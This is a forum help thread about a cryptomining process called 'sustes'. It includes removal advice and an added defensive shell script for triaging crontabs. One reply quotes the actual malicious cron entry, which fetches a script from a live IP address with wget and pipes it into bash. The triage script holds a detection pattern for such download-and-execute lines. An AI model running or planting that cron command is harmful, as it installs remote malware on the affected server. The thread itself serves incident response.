What is this "sustes" in my process in my CPU stats?

Posted on July 11, 2018

Under CPU Processes I have one thread running high at 54.50%. I have no clue what it means…




We’ve found a similar script/process. Turned out our test server had been compromised and it’s actually been mining cryptocurrency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

Hello friend!

I’m afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server’s role is.

Going a bit deeper, I would SSH in and run “top” and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being run from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards, Jarland

This is cryptominer malware. You must delete it from your droplets. First delete this cron job. It runs under the user that called the process “sustes”. You can find this username with “top” or in the output of this command: ps aux | grep sustes

Then look at the cron job of this user: crontab -u username -l If it has this string

then edit this cron job: crontab -e -u username

or delete it entirely with: crontab -r -u username

Then delete these files: /var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123
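
A triage sketch of the checks described in the answers above, added here as an example and not code posted by anyone in the thread: it flags crontab entries that pipe a download into a shell and lists which of the named /var/tmp files exist. The function names, the `--audit` switch and the sample crontab (with a documentation-range address) are constructed.

```sh
#!/bin/sh
# Added example: triage helper for the checks described in the answers above.
# Function names, --audit and the sample crontab are constructed.

# Read crontab text on stdin; print entries that pipe a download into a shell,
# the shape of the cron entry quoted in this thread.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*(#|$)' |
        grep -E '(wget|curl)[^|]*[|][[:space:]]*(ba|da|z)?sh([[:space:]]|$)'
}

# Print which of the files named in the thread exist under an optional root
# prefix (empty = live system; a path = mounted image or test directory).
miner_artifacts() {
    root="${1:-}"
    for f in /var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123; do
        [ -e "${root}${f}" ] && printf '%s\n' "${root}${f}"
    done
    return 0
}

# Check every account in /etc/passwd; needs root for `crontab -l -u`.
audit_all_users() {
    while IFS=: read -r user rest; do
        hits=$(crontab -l -u "$user" 2>/dev/null | suspicious_cron_lines) || continue
        printf '[cron] %s: %s\n' "$user" "$hits"
    done < /etc/passwd
    miner_artifacts | sed 's/^/[file] /'
}

# Constructed sample: one benign job and one download-and-execute job
# (203.0.113.10 is a documentation-range address).
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh > /dev/null 2>&1
* * * * * wget -q -O - http://203.0.113.10:8220/mr.sh | bash -sh > /dev/null 2>&1
EOF
}

if [ "${1:-}" = "--audit" ]; then
    audit_all_users
fi
```

Run it as root with `--audit` on the affected droplet. It only reads per-user crontabs, so system-wide locations such as /etc/cron.d need a separate look.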
